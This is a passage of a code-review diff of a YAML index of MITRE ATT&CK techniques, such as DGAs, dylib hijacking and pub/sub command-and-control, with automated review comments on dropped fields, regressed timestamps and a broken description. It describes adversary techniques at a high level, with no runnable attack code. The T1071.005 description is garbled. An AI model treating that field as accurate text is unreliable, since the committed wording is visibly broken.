log malicious startup activities.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
+ created: '2019-12-12T14:59:58.168Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1505/001
+ external_id: T1505.001
+ - source_name: Microsoft CLR Integration 2017
+ description: Microsoft. (2017, June 19). Common Language Runtime Integration.
+ Retrieved July 8, 2019.
+ url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
+ - source_name: Microsoft xp_cmdshell 2017
+ description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
+ September 9, 2019.
+ url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
+ - source_name: Kaspersky MSSQL Aug 2019
+ description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
+ attack on Microsoft SQL Server. Retrieved September 4, 2019.'
+ url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
+ - source_name: NetSPI Startup Stored Procedures
+ description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
+ SQL Server – Part 1: Startup Stored Procedures. Retrieved September 12,
+ 2024.'
+ url: https://www.netspi.com/blog/technical-blog/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
+ - source_name: NetSPI SQL Server CLR
+ description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
+ Retrieved September 12, 2024.
+ url: https://www.netspi.com/blog/technical-blog/adversary-simulation/attacking-sql-server-clr-assemblies/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1556.004:
technique:
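Review bot: `x_mitre_permissions_required` (Administrator, SYSTEM, root) is removed from T1505.001 with no replacement, and the same happens to T1568.002's `User` entry in the DGA hunk further down, while the detection text for T1505.001 still keys on `xp_cmdshell`, a feature that needs elevated SQL Server rights; if any selector or report in this repo reads that field to decide which atomic tests need elevation, it now gets nothing for these techniques. Confirm the upstream bundle actually dropped the field for these objects (the jump from `x_mitre_attack_spec_version: 2.1.0` to `3.2.0` suggests a schema change) and note it in the commit message; otherwise keep the field. The NetSPI URL refresh to `www.netspi.com` with updated retrieved dates looks right.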
@@ -43275,7 +43707,7 @@ persistence:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-12-14T23:14:26.107Z'
name: Network Device Authentication
description: |-
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -43299,12 +43731,10 @@ persistence:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.004:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:39.601Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath
, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB
function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -43388,11 +43818,10 @@ persistence:
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -43444,9 +43873,8 @@ persistence:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests:
- name: Create local account (Linux)
@@ -43609,7 +44037,7 @@ persistence:
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T21:35:12.049Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -43647,14 +44075,12 @@ persistence:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1574.012
atomic_tests: []
command-and-control:
T1205.002:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-20T19:56:18.579Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -43717,7 +44143,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1132.001:
technique:
@@ -43775,7 +44200,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1132.001
atomic_tests:
- name: Base64 Encoded data.
@@ -43833,92 +44257,91 @@ command-and-control:
name: sh
T1568.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T15:55:16.111Z'
+ name: Domain Generation Algorithms
+ description: |-
+ Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
+
+ DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
+
+ Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
x_mitre_contributors:
- Ryan Benson, Exabeam
- Barry Shteiman, Exabeam
- Sylvain Gil, Exabeam
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
+
+ Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Flow'
type: attack-pattern
+ id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
created: '2020-03-10T17:44:59.787Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1568.002
url: https://attack.mitre.org/techniques/T1568/002
- - source_name: Cybereason Dissecting DGAs
- url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
- description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
- Eight Real World DGA Variants. Retrieved February 18, 2019.'
- - source_name: Cisco Umbrella DGA
- url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
- description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
- Why so effective?. Retrieved February 18, 2019.
- - source_name: Unit 42 DGA Feb 2019
- url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
- description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
- Generation Algorithms (DGA). Retrieved February 19, 2019.'
- - url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+ external_id: T1568.002
+ - source_name: Elastic Predicting DGA
+ description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
+ 2). Predicting Domain Generation Algorithms with Long Short-Term Memory
+ Networks. Retrieved April 26, 2019.
+ url: https://arxiv.org/pdf/1611.00791.pdf
+ - source_name: Talos CCleanup 2017
description: 'Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast
Number of Machines at Risk. Retrieved March 9, 2018.'
- source_name: Talos CCleanup 2017
- - source_name: Akamai DGA Mitigation
- url: https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html
- description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
- Domain Generation Algorithms. Retrieved February 18, 2019.
- - url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
+ url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+ - source_name: Pace University Detecting DGA May 2017
+ description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
+ Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
+ April 26, 2019.
+ url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
+ - source_name: FireEye POSHSPY April 2017
description: Dunwoody, M.. (2017, April 3). Dissecting One of APT29’s Fileless
WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.
- source_name: FireEye POSHSPY April 2017
+ url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
- source_name: ESET Sednit 2017 Activity
- url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
description: 'ESET. (2017, December 21). Sednit update: How Fancy Bear Spent
the Year. Retrieved February 18, 2019.'
+ url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
- source_name: Data Driven Security DGA
- url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
2, Feature Engineering. Retrieved February 18, 2019.'
- - source_name: Pace University Detecting DGA May 2017
- url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
- description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
- Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
- April 26, 2019.
- - source_name: Elastic Predicting DGA
- url: https://arxiv.org/pdf/1611.00791.pdf
- description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
- 2). Predicting Domain Generation Algorithms with Long Short-Term Memory
- Networks. Retrieved April 26, 2019.
- modified: '2022-05-11T14:00:00.188Z'
- name: Domain Generation Algorithms
- description: |-
- Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
-
- DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
-
- Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- x_mitre_detection: |-
- Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
-
- Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
+ - source_name: Akamai DGA Mitigation
+ description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
+ Domain Generation Algorithms. Retrieved February 18, 2019.
+ url: https://medium.com/@yvyuz/a-death-match-of-domain-generation-algorithms-a5b5dbdc1c6e
+ - source_name: Cisco Umbrella DGA
+ description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
+ Why so effective?. Retrieved February 18, 2019.
+ url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
+ - source_name: Cybereason Dissecting DGAs
+ description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
+ Eight Real World DGA Variants. Retrieved February 18, 2019.'
+ url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
+ - source_name: Unit 42 DGA Feb 2019
+ description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
+ Generation Algorithms (DGA). Retrieved February 19, 2019.'
+ url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Network Traffic: Network Traffic Flow'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071.004:
technique:
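Review bot: The tail of this hunk deletes the whole x_mitre_detection paragraph for the DGA sub-technique (the "Detecting dynamically generated domains..." and "Machine learning approaches..." lines) together with `x_mitre_data_sources`, `x_mitre_permissions_required` and `x_mitre_is_subtechnique`, and only `x_mitre_modified_by_ref` and the new external references are visible as replacements; confirm these keys are re-emitted earlier in the reordered object rather than dropped, since the detection text is the only defender guidance on that technique. The four added references (Akamai DGA Mitigation, Cisco Umbrella DGA, Cybereason Dissecting DGAs, Unit 42 DGA Feb 2019) should each be cited by a `(Citation: ...)` marker somewhere in the object, otherwise they are dead entries.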
@@ -43984,9 +44407,67 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1071.004
atomic_tests: []
+ T1071.005:
+ technique:
+ modified: '2024-10-16T13:08:35.629Z'
+ name: Publish/Subscribe Protocols
+ description: "Adversaries may communicate using publish/subscribe (pub/sub)
+ application layer protocols to avoid detection/network filtering by blending
+ in with existing traffic. Commands to the remote system, and often the results
+ of those commands, will be embedded within the protocol traffic between the
+ client and server. \n\nProtocols such as MQTT
, XMPP
,
+ AMQP
, and STOMP
use a publish/subscribe design,
+ with message distribution managed by a centralized broker.(Citation: wailing
+ crab sub/pub)(Citation: Mandiant APT1 Appendix) Publishers categorize their
+ messages by topics, while subscribers receive messages according to their
+ subscribed topics.(Citation: wailing crab sub/pub) An adversary may abuse
+ publish/subscribe protocols to communicate with systems under their control
+ from behind a message broker while also mimicking normal, expected traffic."
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ x_mitre_contributors:
+ - Domenico Mazzaferro Palmeri
+ - Sofia Sanchez Margolles
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ - Windows
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Flow'
+ - 'Network Traffic: Network Traffic Content'
+ type: attack-pattern
+ id: attack-pattern--241f9ea8-f6ae-4f38-92f5-cef5b7e539dd
+ created: '2024-08-28T14:14:18.512Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1071/005
+ external_id: T1071.005
+ - source_name: wailing crab sub/pub
+ description: Hammond, Charlotte. Villadsen, Ole. Metrick, Kat.. (2023, November
+ 21). Stealthy WailingCrab Malware misuses MQTT Messaging Protocol. Retrieved
+ August 28, 2024.
+ url: https://securityintelligence.com/x-force/wailingcrab-malware-misues-mqtt-messaging-protocol/
+ - source_name: Mandiant APT1 Appendix
+ description: Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal.
+ Retrieved July 18, 2016.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1573.001:
technique:
modified: '2023-12-26T20:58:19.356Z'
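Review bot: The `description` scalar of the new T1071.005 object is broken between "Protocols such as MQTT" and "use a publish/subscribe design,": the fragments ", XMPP", ",", ", and STOMP" and "use a publish/subscribe design," appear on their own lines without a diff prefix, so the committed text either contains raw line breaks inside a double-quoted scalar or lost inline link markup when it was generated. Regenerate this entry from the source bundle and confirm the file still loads (`yaml.safe_load`) and that the sentence renders as "Protocols such as MQTT, XMPP, AMQP, and STOMP use a publish/subscribe design". Two smaller points: `x_mitre_detection: ''` leaves the sub-technique with no detection guidance even though the description names two data sources (`Network Traffic Flow` and `Network Traffic Content`), and the "wailing crab sub/pub" citation reads "Metrick, Kat.." with a doubled period.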
@@ -44032,7 +44513,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1568.001:
technique:
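Review bot: `spec_version: '2.1'` is deleted here and from every other technique object in this file (T1071.004, T1071, T1219, T1659, T1205, T1572, T1071.003, T1092, T1090.002, T1090, T1568, T1568.003, T1104, T1205.001, T1102.003, T1090.003, T1001, T1571, T1573, T1102.002, T1573.002, T1095 and others), while `x_mitre_attack_spec_version` is kept or bumped to 3.2.0. If the index generator or any downstream consumer still reads `spec_version` to pick a STIX parser, this should be called out in the PR description; if the key is simply no longer present in the upstream bundle, a one-line note in the commit message would save the next reader from wondering whether it was dropped by accident.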
@@ -44064,7 +44544,7 @@ command-and-control:
url: https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/
description: 'Albors, Josep. (2017, January 12). Fast Flux networks: What
are they and how do they work?. Retrieved March 11, 2020.'
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-27T16:10:37.183Z'
name: Fast Flux DNS
description: |-
Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)
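Review bot: The `modified` timestamp for Fast Flux DNS moves backwards, from 2021-04-29T14:49:39.188Z to 2020-03-27T16:10:37.183Z, and the same regression from that identical 2021-04-29 value appears for T1572, T1102.003, T1568.003, T1104, T1102.002 and T1001.003 later in the diff, with T1205, T1090, T1568 and T1205.001 regressing from other shared "14:00:00.188Z" stamps. The old values look like batch-update stamps being replaced with per-object times from the source bundle, which is plausible, but a reviewer cannot tell from the hunk whether the generator picked the wrong field; please confirm against the upstream STIX `modified` values and mention the expected regression in the PR description so that anyone diffing index files by `modified` is not misled.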
@@ -44086,22 +44566,20 @@ command-and-control:
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071:
technique:
- modified: '2024-01-17T22:52:23.454Z'
+ modified: '2024-08-28T14:10:33.145Z'
name: Application Layer Protocol
description: "Adversaries may communicate using OSI application layer protocols
to avoid detection/network filtering by blending in with existing traffic.
Commands to the remote system, and often the results of those commands, will
be embedded within the protocol traffic between the client and server. \n\nAdversaries
may utilize many different protocols, including those used for web browsing,
- transferring files, electronic mail, or DNS. For connections that occur internally
- within an enclave (such as those between a proxy or pivot node and other nodes),
- commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye
- Spy Email Nov 22) "
+ transferring files, electronic mail, DNS, or publishing/subscribing. For connections
+ that occur internally within an enclave (such as those between a proxy or
+ pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation:
+ Mandiant APT29 Eye Spy Email Nov 22) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
@@ -44123,7 +44601,7 @@ command-and-control:
- macOS
- Windows
- Network
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
@@ -44148,7 +44626,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1071
atomic_tests: []
T1219:
@@ -44232,7 +44709,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1219
atomic_tests: []
T1659:
@@ -44296,11 +44772,10 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1205:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T23:08:40.603Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -44384,7 +44859,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1572:
technique:
@@ -44415,7 +44889,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-27T17:15:35.372Z'
name: Protocol Tunneling
description: "Adversaries may tunnel network communications to and from a victim
system within a separate protocol to avoid detection/network filtering and/or
@@ -44435,8 +44909,8 @@ command-and-control:
encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua
JUL19) \n\nAdversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572)
in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or
- [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to
- further conceal C2 communications and infrastructure. "
+ [Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003)
+ to further conceal C2 communications and infrastructure. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
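Review bot: The description for T1572 changes here (the link text becomes "Protocol or Service Impersonation" to match the T1001.003 rename later in this diff), yet the preceding hunk for the same object rewinds `modified` to 2020-03-27T17:15:35.372Z and no `x_mitre_version` bump is visible for T1572. A content change with an older modification time is inconsistent; either the new `modified` value is wrong for this object or the upstream bundle carries a later stamp that the generator is not using. Please check this object specifically rather than treating it as part of the blanket timestamp regression.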
@@ -44458,8 +44932,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1572
atomic_tests: []
T1071.003:
@@ -44521,7 +44993,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1092:
technique:
@@ -44569,7 +45040,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1090.002:
technique:
@@ -44623,7 +45093,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
